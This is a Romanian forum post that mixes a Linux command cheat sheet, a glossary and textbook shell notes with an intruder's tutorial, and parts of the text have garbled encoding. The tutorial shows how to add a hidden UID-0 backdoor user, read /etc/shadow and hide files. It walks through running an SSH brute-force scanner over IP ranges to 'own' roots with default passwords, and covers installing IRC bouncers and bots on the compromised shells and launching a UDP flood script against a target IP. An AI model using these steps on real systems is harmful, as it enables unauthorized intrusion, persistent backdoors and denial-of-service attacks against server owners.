Admin
Administrator
 Din: Dej
Inregistrat: acum 18 ani
Postari: 40
|
|
Comnezile Des Folosite In Linux Sunt :
- cd -> deschidere de director /in acelasi timp si iesi dintr-un director cu ea pana in /home director ;
- cd - (minus) -> mergi la directorul anterior
- cd dir && command -> / dechide director , executa comanda si se intoarce in directorul precedent .
- ls -> afiseaza continutul unui director
- ls -lrt -> listeaza rapid fiserele din dir curent aranjandule dupa data modificarii .
- pico -> Pe majoritatea sistemelor - editeaza un fisier / de ex ai fisier : mech.set // dai pico mech.set
- vi -> similar cu pico doar ca e un program diferit . / de ex : vi mech.set
- cat -> nu editeaza ci doar citeste fisere .
- gpg -c file -> encripteaza fisiere
- gpg file.gpg -> decripteaza un fiser de extensie .gpg
- echo 'wget url' | at 01:00 ->echo e ceva gen schedule pe windows -// dai echo si comanda | at time /i love this command :P
- echo I live in <country> -> / afiseaza date despre tara respectiva .
- tar c dir/ | bzip2 > dir.tar.bz2 -> arhiveaza directorul introdus .
- tar cvzf folder.tgz folder/ - arhiveaza folderul respectiv .
- tar -zxvf ( sau tar xzvf) -> dezarhiveaza o arhiva : de ex ai arhiva : emech-
darwin.tar.gz // tar xzvf emech-darwin.tar.gz
- wget url -> downloadeaza url-ul introdus .
- hostname -i -> afiseaza ip-ul serverului respectiv // echivalent cu -> hostname /.
- cal -3 -> afiseaza calendar
- cal 9 1752 -> afiseaza calendarul pt luna a9a din anul 1752 :P
- date -d fri -> afiseaza data acestei vineri .
- w -> listeaza toate conexiunile in momentul respectiv la serverul pe care esti ;
- lsof -p $$ -> afiseaza adresele proceselor pornite de userul de pe care esti .
- lsof ~ -> afiseaza procesele apelate de cele la care ti s-a aratat adresa cu
comanda anterioara .
- lynx url -> navighezi pe internet de pe linux
- passwd -> meniu de schimbare de parola pt userul pe care esti .
- pwd -> afiseaza adresa directorului in care esti .
- mkdir -> creeaza director /ex : mkdir stef :P
- mv -> muta un fisier/director intr-o locatie : /ex : mv psybnc.tgz /tmp/.stef
sursa DarthSion
- cat /etc/issue -> ca sa afli ce versiune de linux ai .
- /sbin/ifconfig | grep inet -> vezi ip-urile serverului .
- cat /etc/hosts -> iti arat host-urile root-ului .
- cat /etc/passwd -> astfel sti cate usere si ce usere sunt .
- /usr/sbin/useradd user -> Adaugi un user .
- /usr/sbin/useradd -o -u 0 user -> Adaugi un user dar cu drept de root
- /usr/sbin/userdel useru -> stergi usere .
sursa Slasher
Comenzi Linux "Root"
comenzii linux (root)
w -->iti arata uptime, si cine mai e online
who -->iti arata cine mai e online pe sistem
ocklist => ce porturi are deschise
cat /etc/shadow => parole scriptate
/sbin/ifconfig | grep inet => ce ip-uri are
/etc/hosts => vhost-urile
/usr/sbin/adduser -g0 | passwd | /usr/sbin/userdel
cat /etc/passwd => ce usere are
w , uptime => arata de cate zile este serverul sus
id, whoami => arata dreptul pe care il avem pe root: apache sau root
ls, dir => arata continutul unui folder
rm -rf => aterge un folder sau fisier
Impachetez un fisier tar chf fisier.tar fisier
=> tar zcd fisier.tar director
ping -c1 yahoo.com => Vad ip la un server
/sbin/ipchains -A input --destination-port -p tcp -j REJECT
route add -host ip-ul reject Inchid un port anume
cat /proc/cpuinfo Informatii despre sistem
rpm -Uhv arhiva despachetez arhiva rpm
gzip -9 ex.tar modifik extensia tar in tar.gz
/usr/sbin/useradd -o -u 0 http fak shell
cat /etc/issue vad versiunea de linux
gcc program.c -o program compilez un program
df -h vad cat spatiu are hardu
/etc/rc.d/init.d Afisate Pidurile
cat /etc/hosts Vad Vhosturile
netstat -aut VAd cine mai ii pe roata
cat /etc/*release Vad versiunea de linux
alias ls='dir --color=tty' Bag ls
/usr/sbin/userdel user Sterg user
find / -name ".. " -print -xdev caut foldere ascunse
find / -name ".*" -print -xdev | cat -v caut foldere ascunse
dictionar linux
apache -> Apache este un puternic open source server web dezvoltat de catre Apache Group. Acesta ruleza pe sitemele de operare Unix, Linux, sau Windows. Aceasta aplicatie este o derivare a originalului server de web NCSA dezvoltat de Universitate Illinois din Urbana-Champaigne. Apache este cel mai polpular server web de pe internet, si mult mai puternic decat Internet Information Server al firmei Microsoft, cel mai apropiat competitor.
APM -> (Advanced Power Management) O functie utilizate de anumite BIOS-uri pentru a trece computer-ul intr-o stare de stand-by dupa o anumita perioada de inactivitate. Pe laptop-uri, APM-ul este responsabil cu raportarea starii bateriei si, daca este suportat, timpul estimat ramas de viata a bateriei.
APT -> Advanced Package tool/Outil de paquetage avance(DEBIAN)
ARP-> Address Rezolution Protocol Realizeaza pentru IP (Internet Protocol) gasirea adresei hardware a masinii de destinatie.
ASCII -> (American Standard Code for Information Interchange). Codul standard utilizat pentru stocarea caracterelor, incluzand caracterele de control, pe un computer. Multe coduri pe 8 biti (ca ISO 8859-1, setul de caractere implicit sub Linux) contin ASCII ca prima jumatate.
bash -> Bash este un interpretor-limbaj de comanda care executa comenzi citite de la intrarea standard sau dintr-un fisier.
Browser -> Program folosit la navigarea pe site-uri web ce permite vizualizarea de pagini hypertext(html), documente, imagini, secvente video shi audio.
BSD -> (Berkley Software Distribution) O varianta de Unix creata de departamentul de informatica de la Universitatea Berkley. Aceasta versiune a fost considerata intotdeauna mai avansata din punct de vedere tehnic, si a adus multe inovatii in lumea informaticii in general si Unix-ului in particular.
c/c++ -> limbaj de programare pe care se bazeaza linuxul
CHAP -> (Chalange-Handshake Authentication Protocol) Protocol folosit de ISP's pentru a autentifica clientii lor.
CIFS -> (Common Internet FileSystem) Predecesorul sistemului de fisiere SMB, folosit pe sisteme DOS.
ctime -> Data creeari fisierului
DHCP -> (Dynamin Host Configuration Protocol) Protocol creat pentru ca masinile dintr-o retea locala sa obtina dinamic o adresa IP de la un server DHCP.
DMA -> (Direct Memory Access) O facilitate utilizata in arhitectura PC-urilor care permite unui periferic sa citeasca sau sa scrie in memoria principala fara ajutorul procesorului.
DPMS -> (Display Power Management System) Protocol utilizat de toate monitoarele moderne pentru a administra functiile de economisire a energiei. Monitoarele care suporta aceste functii sun numite "green monitors".
ELF -> (Executable and Linking Format) Formatul binar utilizat de cele mai multe distributii CNU/Linux din zilele noastre.
ext2 -> Prescurtarea de la "Extended 2 filesystem". Este sistemul de fisiere nativ al GNU/Linux si are toate caracteristicile oricarui sistem de fisiere din Unix: suport pentru fisiere speciale (legaturi sibmolice,...), permisiuni pe fisier, etc.
FAQ -> (Frequently Asked Questions) Un document care contine o serie de de intrebari/raspunsuri despre un anumit subiect. FAQ-urile au aparut in newsgroup-uri, dar acest tip de document apare acum pe diferite site-uri web, si chiar produse comerciale au propriul FAQ. In general, acestea sunt surse foarte bune de informatii.
FAT -> (File Allocation Table) Sistem de fisiere folosit de DOS si Windows.
FDDI -> (Fiber Distributed Digital Interface) Un nivel fizic de mare mare viteza a unei retele, care utilizeaza fibra optica pentru comunicatie. Folosit doar de retelele mari, in principal din cauza costurilor.
FHS -> (Filesystem Hierarcy Standard) Un documnent care contine trasaturile unei organizari coerente sub forma de arbore a fisierelor in sistemele Unix.
FIFO -> (First In, First Out) O structura de date sau buffer hardware de unde obiectele sunt luate in ordinea in care au fost puse.
FTP -> (File Transport Protocol) Acesta este protocolul standard utilizat la transferarea fisierelor de pe un computer pe altul.
pt wget pt.:Bnc,Psybnc,Botii,WU-Exploits,WU-PATCH,SSH exploits,PHP Exploits,Securizare Samba,Arhiva Psybnc,Bnc,botii................ Scanere,Sniffer,Flood,Rk.Pico,Tar,Cgi,Ps,Emech-compilat...............
Ftp........... Comenzi.......Pico....tar,Muh,Librarii linux..........Windows bnc..Darwin bnc
sursa carter
comenzii shell
O comanda( shell are urma(toarea forma( sintactica( generala(:
$ <comanda> [<optiuni>] [<parametri>] ,unde:
· <comanda> reprezinta( numele comenzii (fis,ier executabil = procedura(, funct,ie, program);
· <optiuni> reprezinta( opt,iuni desemnate printr-o litera(, precedata de semnul �-“ sau “+�; daca( sunt mai multe opt,iuni, acestea se scriu una dupa( alta, fa(ra( spat,iere, dar precedate de semnul “-“ sau “+�;
· <parametri> reprezinta( nume de fis,iere sau s,iruri de caractere ce constituie parametrii comenzii.
Observat,ie. Cele trei construct,ii lexicale <comanda>, <optiuni>, <parametri>, trebuie sa( fie separate prin spat,ii.
Numele comenzii <comanda> este numele fis,ierului executabil ce urmeaza( a fi executat s,i este ca(utat în urma(toarea secvent,a(:
· în directorul curent; daca( nu este ga(sit;
· în directorul /bin ; daca( nu este ga(sit;
· în directorul /usr/bin ; daca( nu este ga(sit;
· în caz contrar se da( mesaj de eroare afis,at de Shell.
Construct,ia lexicala( <parametri> reprezinta( de multe ori nume de fis,iere a ca(rui sintaxa( a fost precizata(. Interpretorul Shell permite specificarea fis,ierelor s,i prin utilizarea urma(toarelor metacaractere:
· “*� ce semnifica( orice s,ir de caractere, inclusiv s,irul vid;
· ‘?� ce semnifica( orice caracter;
· “[…]� ce semnifica( o mult,ime de caractere;
· “-“ ce semnifica( o secvent,a( lexicografica(.
Pe baza acestor metacaractere, interpretorul Shell va genera nume de fis,iere utilizate în cadrul comenzilor.
Exemple.
1. *.c - indica( toate fis,ierele având sufixul c;
2. def[0-9] - indica( fis,ierele def0, def1, …, def9;
3. prog[09] - indica( fis,ierele def0, def9;
4. cap? - indica( fis,ierele existente cap1, cap2, cap3;
5. cap* - indica( fis,ierele existente cap1, cap2, cap3, cap1.c, cap2.c;
6. prog[*?] - indica( atât varianta prog*, cât s,i varianta prog?.
Procese paralele
În mod normal, interpretorul de comenzi Shell executa( comenzile secvent,ial, dar are facilita(t,i pentru lansarea de procese în paralel pe care sa( le controleze. Un proces este creat de un alt proces prin execut,ia funct,iei (apelului) de sistem fork.
Dupa( init,ierea (deschiderea) unei sesiuni de lucru la un terminal (stat,ie de lucru), sistemul Unix lanseaza( un proces Shell pentru terminalul respectiv. ÃŽn mod normal, sistemul Unix considera( ca( un proces poate sa( treaca( prin urma(toarele sta(ri:
· crearea procesului ( funct,ia de sistem fork);
· as,teptarea (repaus) pentru execut,ie (funct,ia de sistem wait);
· execut,ia procesului ( funct,ia de sistem exec);
· terminarea (anularea) execut,iei procesului ( funct,ia de sistem kill);
Dupa( crearea unui proces, acesta este trecut în starea Ready (gata de execut,ie) pentru a trece în starea Run (execut,ie) potrivit principiului de time-sharing, care consta( în partit,ionarea timpului unita(t,ii centrale între procese dupa( priorita(t,i. Priorita(t,ile proceselor utilizator sunt evaluate dinamic la intervale fizice (de exemplu la zecimi de secunda(:
Pp = TUC / TM , unde
· Pp reprezinta( prioritatea procesului;
· TUC reprezinta( timpul unita(t,ii centrale acordat procesului;
· TM reprezinta( timpul în memoria interna( pentru proces.
Ordinea de prelucrare a proceselor este data( de ordinea cresca(toare a priorita(t,ilor, procesele de sistem fiind prioritare celor utilizator. Algoritmul de planificare corespunde unui algoritm de tip round-robin ce asigura( eliberarea unita(t,ii centrale de ca(tre procesul curent într-un timp finit. Prelucrarea proceselor necesita( comunicarea între ele. Exista( doua( metode de realizare a comunica(rii intre procese:
· tehnica redirecta(rii - caz în care se foloses,te un fis,ier ce va fi INPUT pentru un proces s,i OUTPUT pentru un alt proces;
· tehnica pipe - caz în care conectarea se face direct între procese, fa(ra( fis,ier intermediar; mecanism de tip server/client;
ÃŽn timpul prelucra(rilor are loc sincronizarea proceselor ce se refera( la urma(toarele:
· sincronizarea procesului tata( în raport cu procesul fiu s,i care este controlata( de utilizator prin utilizarea funct,iei de sistem wait care blocheaza( procesul tata( pâna( la terminarea procesului fiu;
· sincronizarea prin mesaje ce este controlata( de sistem s,i se refera( la comunicarea între procese prin pipe;
· sincronizarea prin evenimente s,i care este controlata( de utilizator prin semnale recunoscute de sistem: pause, kill, allarm.
Pentru gestionarea proceselor, nucleul (Kernel) foloses,te doua( zone:
· tabela de procese în care se introduc mai multe informat,ii, s,i anume:
n identificatorul procesului (PID);
n identificatorul utilizatorului;
n lungimea procesului;
n locul în memorie unde este rezident în mod curent;
· structura utilizator în care se afla( mai multe informat,ii:
n zona de salvare a registrilor generali;
n informat,ii pentru acces la fis,iere;
n informat,ii despre directorul curent.
Fiecare proces are propriul spat,iu de adrese. Procesul poate adresa orice locat,ie în spat,iul sa(u de adrese fa(ra( sa( aiba( acces la spat,iile altor procese. Spat,iul de adrese al unui proces este constituit din trei segmente (imaginea procesului, supus swapping-ului):
· segmentul de text - cont,ine instruct,iunile programului (codul);
· segmentul de date - cont,ine o zona init,ializata( (constantele programului s,i tablourile init,ializate) s,i o zona( neinit,ializata( (init,ializata( cu zerouri);
· segmentul de stiva( - utilizat pentru stiva de exect,ie a procesului în mod utilizator;
· segmentul de sistem - cont,ine o parte din informat,iile de comanda( ale procesului s,i stiva nucleului.
Principalele comenzi Shell
Comenzile Shell în sistemul Unix pot fi grupate din punct de vedere al functionalita(t,ii în mai multe categorii:
· comenzi pentru informare ( cal, date, time, who, echo, passwd, login, mail, elm, write, tty, stty, man);
· comenzi pentru gestiunea directoarelor ( pwd, cd, mkdir, rmdir, ls);
· comenzi pentru gestiunea fis,ierelor ( cat, pr, lpr,lp, file, find, rm, cp, mount, umount, mv, cmp, chmod, chown, chgrp, diff, sort, tsort, tail, wc);
· comenzi pentru gestiunea proceselor ( ps, nice, kill, sleep, time, sh, at );
· comenzi pentru gestiunea volumelor ( df, dn ).
Multe din comenzile Shell sunt de fapt utilitare cu foarte multe facilita(t,i. Pentru descrierea lor vom folosi, conform obis,nuint,ei, câmpuri opt,ionale delimitate de paranteze drepte [ s,i ], precum s,i construct,ii lexicale pentru entita(t,i (director, fis,ier, etc. ) delimitate de paranteze ascut,ite < s,i >. Vom conveni ca pentru repetarea unui element sa( utiliza(m imediat dupa( el scrierea “…�.
Comenzi pentru informare
1. $cal [<luna>] [<an>]
- afis,eaza( calendarul (gregorian) al lunii curente daca( lipsesc parametri
2. $date
- afis,eaza( data curenta(
3. $time
- afis,eaza( timpul curent
4. $who
- afis,eaza( numele utilizatorilor conectat,i la sistem în momentul respectiv
5. $echo [<text>]
- afis,eaza( (un ecou) la ies,irea standard textul <text>
6. $passwd
- modifica( parola existenta( pentru utilizatorul respectiv
7. $login
- deschide o sesiune de lucru Unix care va cere numele utilizatorului s,i parola
8. $mail
- emitere/recept,ie pentru pos,ta electronica(
a) expedierea : $mail <adresa> …
- mesajul (de regula( mai scurt) se tasteaza( imediat dupa( comanda( s,i se va termina cu o linie ce va cont,ine “.�; mesajul se va transmite la destinat,ie în directorul /usr/mail;
b) recept,ia : $mail
- consultarea cutiei pos,tale proprie utilizatorului, numita( mbox, s,i care ofera( proprietarului act,iuni de vizualizare, s,tergere, salvare pentru fiecare mesaj din cutia pos,tala(;
Observat,ie.Se poate utiliza comanda $ELM pentru listarea tuturor mesajelor, s,i care ofera( un meniu cu urma(toarele funct,iielete, Undelete, Mail a message, Replay mail, Forward mail, Quit, Read a message.
9. $write <utilizator> [<terminal>]
- transmite un mesaj pe terminalul unui utilizator ce este conectat în sistem;
mesajul se tasteaza( imediat dupa( comanda( s,i se termina( cu <Ctrl>+<Z>
10. $tty
- afis,eaza( numele terminalului (fis,ierul atas,at)
Exemplu:
/dev/pty/ttys3
11. $stty
-afis,eaza( caracteristicile terminalului la care se lucreaza( (viteza de transmisie (speed), paritatea (even/odd), caracteristici de control); pentru setarea caracteristicilor se utilizeaza( comanda $stty <optiuni> ;
12. $man [<comanda>]
- afis,eaza( pe ecran un help despre comenzi; pentru afis,area structurii manualelor UNIX s,i modul lor de consultare, se utilizeaza( comanda $man man
Comenzi pentru gestiunea directoarelor
1. $pwd
- afis,eaza( calea(path) directorului curent; numele comenzii reprezinta( prescurtarea Path Write Directory;
Exemplu: /users/vlada
2. $cd [<director>]
- realizeaza( schimbarea directorului curent (change directory), noul director va fi cel specificat; pentru verificare se pot utiliza doua( comenzi pe aceeas,i linie : $cd [<director>] ; pwd
- se utilizeaza( s,i urma(toarele variante ale comenzii:
$cd - directorul curent devine home aflat în /etc/passwd
$cd .. - directorul curent devine nodul superior(tata(
$cd / - directorul curent devine directorul radacina(root)
3. $mkdir <director>
- se creeaza( un nou director cu numele specificat, ca subdirector al directorului curent; sistemul va seta pentru directorul creat toate drepturile (R,W,X) la toate categoriile de utilizatori;
4. $rmdir <director>
- se s,terge directorul specificat numai daca( nu cont,ine fis,iere
5. $ls [<optiuni>] [<specificator>] …
- se listeaza( cont,inutul directorului specificat(altfel, curent) sau informat,ii despre fis,ierele specificate în cazul în care se specifica(;
- opt,iunile permit precizarea informat,iilor ce vor fi afis,ate, eventual ordinea afis,a(rii; opt,iunile sunt precedate de semnul “-“ s,i pot fi combinate
- cele mai importante opt,iuni sunt:
-l -afis,eaza( mai multe informat,ii despre director/fit,ier (drepturile proprietarului, drepturile grupului, proprietar, dimensiune,data, timpul, nume);
-r -afis,eaza numele fis,ierelor în ordinea invers alfabetica(;
-t -afis,eaza( numele sortate dupa( data ultimei modificari;
-R -afis,eaza( rezumatul directorului specificat s,i al tuturor subdirectoerelor sale.
Exemple.
$ls -listeaza( numele subdirectoarelor directorului curent
$ls -lt -listeaza( cont,inutul directorului curent, sortat dupa( timp
$ls -l *.c -listeaza( informat,ii despre toate fis,ierele directorului curent
ce au sufixul .c
Comenzi pentru gestiunea fis,ierelor
1. $cat [<optiuni>] [<specificator>] [<redirectare>]
- afis,area/concatenarea/crearea de fis,iere text
Exemple.
$cat fisier1 -se afis,eaza( la terminal cont,inutul fis,ierului ‘fisier1’
$cat fisier1 fisier2 >f3 -se concateneaza( cele doua( fis,iere s,i rezultatul se memoreaza( în fis,ierul ‘f3’
Observat,ie. Comanda este echivalenta( cu $cat fisier[12] >f3
$cat >fisier -se creeaza( un fis,ier text de la terminal, prin tastarea de la terminal a liniilor, dupa( care se tasteaza( <Ctrl>+<Z>, iar fis,ierul se va salva în ‘fisier’
2. $pr [<optiuni>] <specificator> [<redirectare>
- listeaza( prin paginare (antet s,i linii) fis,iere text
Exemplu.
$pr f1 f2 >f3.pr -se pagineaza( cele doua( fis,iere, iar rezultatul se salveaza( in fisierul ‘f3.pr’
3. $lpr [<optiuni>] <specificator>
- tipa(rirea la imprimanta( a cont,inutului de fit,iere text
Exemple.
a) $lpr >fisier.pr -tipa(res,te la imprimanta( cont,inutul fis,ierului ‘fisier.pr’
b) $ls -l /bin/usr/bin >fisier -secventa de comenzi realizeaza(
$pr fisier >fisier.pr pe rând crearea fis,ierului ‘fisier’
$lpr fisier.pr cu cont,inutul mai multor directoare,
$rm fisier fisier.pr paginarea lui în ‘fisier.pr’, tipa(rirea
acestuia la imprimanta(, s,i în final
s,tergerea celor doua( fis,iere create
4. $lp [<optiuni>] <specificator>
- tipa(rirea la imprimanta( prin paginare a cont,inutului unor fis,iere
Observat,ie.Pentru utilizarea corecta( a opt,iunilor pentru fiecare comanda(, utilizatorul este invitat sa( consulte help-ul oferit de sistemul Unix prin comanda: $man <comanda>
5. $file <fisier> …
- determina( tipul (sursa(, obiect, executabil, text, etc.) unui fis,ier
6. $find <director> … <conditie>
- se cauta( în directoarele specificate s,i în toate subdirectoarele lor, pentru
a se localiza toate fis,ierele ce satisfac <conditie>
7. $rm [<optiuni>] <fisier> …
- s,terge fis,ierele specificate din directorul curent
- principalele opt,iuni sunt :
-i -consultarea utilizatorului înainte de s,tergere
-r -s,tergerea subdirectoarelor
-f -s,tergerea fis,ierelor protejate la scriere
Exemple.
$rm -i * -se s,terg toate fis,ierele din directorul curent prin confirmare
$rm -r prog -se s,terge tot subarborele legat de directorul prog
8. $cp <fisier> … [<director>]
- realizeaza( copierea de fis,iere în urma(toarele variante:
a) $cp f1 f2 - copiaza( fis,ierul f1 în fis,ierul f2
b) $cp f1 [f2…] dir -copiaza( fis,ierele f1 f2 … în directorul dir
Exemplu.
$cp chem/*.doc /esr/user1/john -copiaza( toate fis,ierele cu sufixul .doc
subdirectorul john
9. $mount <fisier_special> <director>
- montarea (legarea) unui sistem de fis,iere la un director;arborele general al sistemului de fis,iere este unic s,i are ra(da(cina root(/); exista( fis,iere pe alte suporturi (FD, CD) ce trebuie introduse în sistem prin operat,ia de montare; fiecare suport (volum) cont,ine un sistem propriu de fis,iere al ca(rui director ra(dacina se poate atas,a la orice director din sistemul general de fis,iere; operat,ia poate fi utilizata( doar de administratorul de sistem;
Exemplu.
$mount /dev/dk00 /usr/vlada
-leaga( sistemul de fis,iere de pe discheta indicata( de driver-ul
dk00 ca subdirector al directorului vlada
10. $umount <fisier_special>
- operat,ia inversa( monta(rii(lega(rii) unui sistem de fis,iere
11. $mv
- mutarea(redenumirea) de fis,iere în doua( variante:
a) $mv <fisier_sursa> <fisier_dest>
-fis,ierul <fisier_sursa> se redenumes,te <fisier_dest>
b) $mv <fisier> … <director>
-fis,ierele specificate sunt introduse în directorul specificat
12. $cmp [<optiuni>] <fisier1> <fisier2>
- se compara cele doua( fis,iere specificate t,inând seama de opt,iunile:
-l -compara( s,i tipa(res,te octet,ii diferit,i
-s -întoarce codul de retur (0=fis,iere identice,1=diferite, 2=erori)
13. $chmod <categ_util> <operator> <drept> <fisier> …
- schimbarea drepturilor de acces la fis,iere ordinare sau director
- comanda poate fi utilizata( doar de proprietarul fis,ierelor
- <categ_util> reprezinta( categorii de utilizatori, adica(
U=proprietar
G=grup
O=restul utilizatorilor
A=cele trei categorii
- <operator> reprezinta( unul dintre caracterele
+ pentru ada(ugare
- pentru s,tergere
= pentru asignare
- <drept> reprezinta( drepturile oferite de sistemul de operare
r =citire
w =scriere
x = execut,ie
Exemple.
$chmod a+r fisier1 - se da( drept de citire tuturor utilizatorilor fis,ierului fisier1
$chmod go -rw fisier -se ridica( privilegiile de citire s,i scriere pentru grup s,i proprietar
14. $chown <proprietar> <fisier>
- schimba( proprietarul unui fis,ier sau director
- numele proprietarului se ga(ses,te în fis,ierul /etc/passwd
15. $chgrp <grup> <fisier>
- schimba( grupul unui fis,ier sau director
- numele grupului se afla( în fis,ierul /etc/group
16. $diff <optiuni> <fisier1> <fisier2>
- compara( doua( fis,iere de tip ASCII folosind opt,iunile:
-b ignora( spat,iile s,i <tab>
-e crearea comenzilor de editor (a=ada(ugare, c=înlocuire,d=s,tergere)
17. $sort [<optiuni>] [+|- poz] … [-o <f_sortat>] <fisier> …
- sorteaza( fis,ierele specificate la un loc s,i rezutatul este dat în
fis,ierul f_sortat t,inând seama de opt,iunile:
-b ignora( spat,iile s,i <tab>
-n sortare numerica((implicit este alfabetica(
-r sortare descresca(toare
-f translanteaza( literele mari în litere mic
- <poz> este de forma m.n, unde m este deplasamentul în numa(r de câmpuri (începând cu 1), iar n este numa(rul de caractere fat,a( de începutul câmpului(numerotat cu 0); semnul + va însemna începutul cheii de sortare, iar - sfârs,itul cheii;
18. $tsort <fisier>
- sorteaza( topologic fis,ierul specificat
19. $tail [<optiuni>] <fisier>
- afis,eaza( un fragment de la începutul sau de la sfârs,itul fis,ierului
specificat folosind opt,iunile:
- +n / -n n linii/blocuri/caracter de la început/sfârs,it
-l afis,eaza( linii
-b afis,eaza( blocuri
-c afis,eaza( caractere
20. $wc [<optiuni>] <fisier>
- afis,eaza( numa(rul liniilor, cuvintelor, caracterelor din fis,ierul specificat folosind opt,iunile :
-l afis,eaza( numa(r de linii
-w afis,eaza( numa(r de cuvinte
-e afis,eaza( numa(rul caracterelor
Comenzi pentru gestiunea proceselor
1. $ps [<optiuni>] [<proces> …]
- afis,eaza( sta(rile unor procese din sistem t,inând seama de opt,iunile:
-a toate procesele active din sistem
-l informat,ii complete
-n toate procesele ce nu sunt asociate utilizatorului
- informat,iile referitoare la procese sunt:
- flag-urile(F) procesului (00=proces terminat,
01=proces sistem,
04=proces suspendat de pa(rinte,
10=proces în memorie, dar blocat)
- starea procesului(S) (r =proces în coada de as,teptare,
s=proces suspendat,
t=proces terminat,
d=proces evacuat temporar pe disc,
o=proces aflat în execut,ie)
- identificatorul utilizatorului (uid)
- identificatorul procesului (pid)
- identificatorul procesului pa(rinte (ppid)
- prioritatea procesului (pri)
- terminalul de unde a fost lansat (tty)
- timpul oferit de UC (time)
- prioritate modificata prin nice
- adresa din memorie la care se afla( (addr)
- lungimea procesului (size)
- momentul de start al procesului (stime)
2. $kill [<pid_proces>]
- terminarea unui proces în execut,ie t,inând seama de identificatorul procesului(pid)
3. $sleep <nr_secunde>
- suspenda( temporar execut,ia unui proces
4. $time <comanda>
- furnizeaza( timpul de execut,ie s,i timpul UC la sfârs,itul termina(rii unei
comenzi lansate în execut,ie
5. $sh <fisier>
- lansarea în execut,ie a unui fis,ier de comenzi Shell
6. $at <timp> [<zi>] [+ <increment>] <fisier>
- lansarea în execut,ie la termen a unui program t,inând seama de
- <timp> ce reprezinta( h:m (ora s,i minutul)
- <zi> ce reprezinta( numele lunii urmat de numa(rul zilei
- <increment> este unul din cuvintele: minutes, hours, days, weeks, months, precedat de un numa(r
Exemplu.
$at 08:05 jan 24 +2 days prog
7. $nice [-n] <comanda> [<argumente>]
- lanseaza( un proces în paralel cu prioritate redusa(, unde
-n este un numa(r fixat care este adunat la ordinul de prioritate
implicit s,i rezulta( prioritatea cu care se executa( <comanda>
Observat,ie.
Exista( un numa(r de 20 de ordine de prioritate, numerotate da la 1 la 20.
Prioritatea maxima( este 1, iar cea minima( este 20. ÃŽn general, daca( nu se
modifica( explicit priorita(t,ile, un proces se executa( cu prioritatea 10 sau cu
o prioritate implicita( fixata( printr-un apel de sistem.
Exemplu.
$nice -8 sort <a >b &
Comenzi pentru gestiunea volumelor
1. $df [<fisier_sistem>]
- indica( spat,iul liber pe un anumit volum unde este montat un sistem de fis,iere; daca( fis,ierul sistem nu este specificat, se afis,eaza( spat,iul liber pentru toate sistemele de fis,iere montate
2. $du [<optiuni>] <fisier>
- afis,eaza( numa(rul blocurilor alocate pe un volum(disc), unde <fisier> este numele unui volum montat sau numele unui director; opt,iunile sunt:
-a genereaza( o lista ce cont,ine numele fieca(rui fis,ier s,i
numa(rul de blocuri alocate
-r scrie mesaje despre directoare ce nu pot fi citite,
fis,iere ce nu pot fi deschise, etc.
-s afis,eaza( numai numa(rul de blocuri alocate
Exemplu.
$du -a /usr/user1/teme
Hai Sa Trecem O data La Minunata Lume Scanatului
daca vrei sa downloadezi arhiva de scanner unixcod dai urmatoarea comanda
wget
acum tr sa despachetam arhiva :
tar -zxvf unixcod.tar.gz
shtergem arhiva de scanner din root / linux /shell :
rm -rf unixcod.tar.gz
acum intram in folderu scanner`ului
cd unixcod
pt a putea scana dai urmatoarea comanda
chmod +x * [ aceasta comanda nu tr data de fiecare data]
iar pt a porni scanner`u dai :
./unix ip.ip
unde ip.ip poate fii 1.1 1.2 1.3 ... 1.250 ... 250.250
cand scanneru zice ceva de gen
[+] UnixCoD own -> root:admin xx.xxx.xxx.xxxx
inseamna ca ai loat un root cu user`u root pass`u : admin , ip: xxx.xxx.xxx.xxx pe portu`l 22
iar daca scanneru zice
[+] No SSH ->root:adminxx.xxx.xxx.xxx atunci ai laot un nologin cu usr`u : root pass`u admin , ip : xxx.xxx.xxx.xxx pe portu 22 [icnerca sa te conectezi cu ftp la el  ]
cum sa iti faci bnc si emech pe root linux shall
bnc-ul
BNC PE LINUX
wget
tar xzvf psybnc.tar.gz
rm -rf psybnc.tar.gz
cd psybnc
make
pico psybnc.conf (schmba portu )
./psybnc ( dai drumu la bnc )
pt a te conecta la bnc tr sa intri pe mirc :
/server ip port
psybnc pe darwin
wget
tar zxvf psydrawin.tar.gz
cd psydrawin
make [nu cred ca o sa necisite sa dati make :d ]
pico psybnc.conf (schmba portu )
./psybnc ( dai drumu la bnc )
Bnc pe FreeBsd
wget
tar zxvf psyfreebsd.tar.gz
cd psyfreebsd
make
pico psybnc.conf (schmba portu )
./psybnc ( dai drumu la bnc )
psybnc-sunos
wget
tar -zxvf psybnc-sunos.tar.tar
cd psybnc-sunos
make
pico psybnc.conf (schmba portu )
./psybnc ( dai drumu la bnc )
EMECH
Emech for Linux
wget
tar xvzf bots.tar.gz
rm -rf bots.tar.gz
cd bots
chmod +x *
"configurezi"
./inetd
Emech for Drawin
wget
nu mai explic cum se face ca nu prea mai am chef si sper ca ati prins idea :d
eggdrop
wget
tar xzvf egg-aa.tar.gz
rm -rf egg-aa.tar.gz
cd egg-aa
pico eggdrop.conf (configurare)
./eggdrop -m eggdrop.conf (pt a porni egg`u )
radio
wget
tar xzvf shoutcast-1-9-5-linux-glibc6.tar.gz
rm -rf shoutcast-1-9-5-linux-glibc6.tar.gz
cd shoutcast-1-9-5-linux-glibc6
pico sc_serv.conf (configureaza)
./sc_serv ( start )
Flood
wget
unzip udp.zip
chmod +x *
rm -rf udp.zip
perl udp.pl ip port tine [la tine pui 0 ]
sau daca nu ai functia unzip
wget
chmod +x *
perl udp.pl ip port time [la time pune 0 ]
{Acest tutorial a fost tiparit de catre Y2K}
|
|
